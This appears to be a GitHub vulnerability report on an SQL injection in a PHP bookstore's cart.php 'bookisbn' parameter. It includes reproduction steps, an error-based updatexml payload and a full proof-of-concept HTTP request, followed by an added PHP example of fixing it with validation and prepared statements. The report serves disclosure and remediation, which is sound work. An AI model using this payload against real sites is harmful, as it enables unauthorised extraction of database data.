
SQL Injection vulnerability via the "bookisbn" parameter in cart.php #18

Open
khanhchauminh opened this issue Oct 30, 2021 · 0 comments


khanhchauminh commented Oct 30, 2021

Author: KhanhCM (@khanhchauminh)

Version: 1.0

Steps to reproduce

  1. Go to any book detail page by clicking on that book's image.
  2. Click on "Purchase / Add to cart" button.
  3. Intercept the request and insert the payload in the value of the bookisbn parameter.

Example payload:

' or updatexml(1,concat(0x7e,(version())),0) -- a

Proof-of-concept

POST /cart.php HTTP/1.1
Host: 127.0.0.1:8888
Content-Length: 137
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.89.145:8888
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://127.0.0.1:8888/book.php?bookisbn=978-1-49192-706-9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=2vmimaak7ho1ccnj624a5js0lq
Connection: close

bookisbn=978-1-49192-706-9%27%20or%20updatexml%281%2Cconcat%280x7e%2C%28version%28%29%29%29%2C0%29%20--%20a&cart=Purchase+%2F+Add+to+cart

Response in Burp Suite

[screenshot]

Source code review

cart.php

[screenshot]

functions/cart_functions.php

[screenshot]

functions/database_functions.php

[screenshot]

Remediation

Validate input of bookisbn parameter in cart.php.
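As an added example (not code from the repository or from the reporter), the following shows what the suggested remediation looks like in a hardened cart handler: the bookisbn value is checked for ISBN-13 shape and check digit before use, bound in a prepared statement rather than concatenated into SQL, and database errors are logged instead of echoed, since the reported payload depends on the MySQL error text reaching the response. The table and column names (books, book_isbn, book_title, book_price), the PDO DSN and credentials, and the function names are assumptions.

```php
<?php
declare(strict_types=1);

// Added example, not the project's code. Hardened handling of the bookisbn
// POST parameter for a cart endpoint. Assumed: a `books` table with columns
// book_isbn, book_title, book_price, and placeholder DSN/credentials in connectDb().

function connectDb(): PDO
{
    // Placeholder DSN and credentials; replace with the application's real settings.
    $db = new PDO('mysql:host=127.0.0.1;dbname=bookstore;charset=utf8mb4', 'DB_USER', 'DB_PASSWORD');
    // Use real server-side prepares; with emulation on, PDO interpolates values client-side.
    $db->setAttribute(PDO::ATTR_EMULATE_PREPARES, false);
    // Raise exceptions so errors are logged server-side rather than printed into the page.
    $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    return $db;
}

// Accept only a well-formed ISBN-13 such as 978-1-49192-706-9:
// 13 digits, optional single hyphens between digits, and a valid check digit.
function isValidIsbn13(string $isbn): bool
{
    if (preg_match('/^\d(?:-?\d){12}$/', $isbn) !== 1) {
        return false;
    }
    $digits = str_replace('-', '', $isbn);
    // ISBN-13 check digit: weights alternate 1,3 over the first 12 digits.
    $sum = 0;
    for ($i = 0; $i < 12; $i++) {
        $sum += (int) $digits[$i] * ($i % 2 === 0 ? 1 : 3);
    }
    $check = (10 - ($sum % 10)) % 10;
    return $check === (int) $digits[12];
}

// Look up the book for the cart. Returns null for an invalid ISBN or an unknown book.
function findBookForCart(PDO $db, string $bookIsbn): ?array
{
    if (!isValidIsbn13($bookIsbn)) {
        return null;
    }
    // The value is bound as a parameter, never spliced into the SQL text.
    $stmt = $db->prepare(
        'SELECT book_isbn, book_title, book_price FROM books WHERE book_isbn = :isbn'
    );
    $stmt->execute([':isbn' => $bookIsbn]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Request handling in the style of cart.php (assumes session_start() was called earlier).
if (PHP_SAPI !== 'cli' && isset($_POST['cart'])) {
    $bookIsbn = is_string($_POST['bookisbn'] ?? null) ? $_POST['bookisbn'] : '';
    try {
        $book = findBookForCart(connectDb(), $bookIsbn);
    } catch (PDOException $e) {
        // Log the detail; the client only sees a generic failure.
        error_log('cart.php database error: ' . $e->getMessage());
        http_response_code(500);
        exit('Unable to process request.');
    }
    if ($book === null) {
        http_response_code(400);
        exit('Invalid book selection.');
    }
    $_SESSION['cart'][$book['book_isbn']] = $book;
}

// CLI self-check: the legitimate ISBN from the report passes, the injected value is rejected
// before any SQL is built.
if (PHP_SAPI === 'cli') {
    var_dump(isValidIsbn13('978-1-49192-706-9'));
    var_dump(isValidIsbn13("978-1-49192-706-9' or updatexml(1,concat(0x7e,(version())),0) -- a"));
}
```

Validation and parameter binding are independent layers: the prepared statement alone already prevents the injected text from changing the query, while the ISBN check also rejects malformed input early and keeps garbage out of error logs and the session cart. Disabling display_errors in production (or, as here, catching PDOException and logging it) removes the channel the error-based payload relies on.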
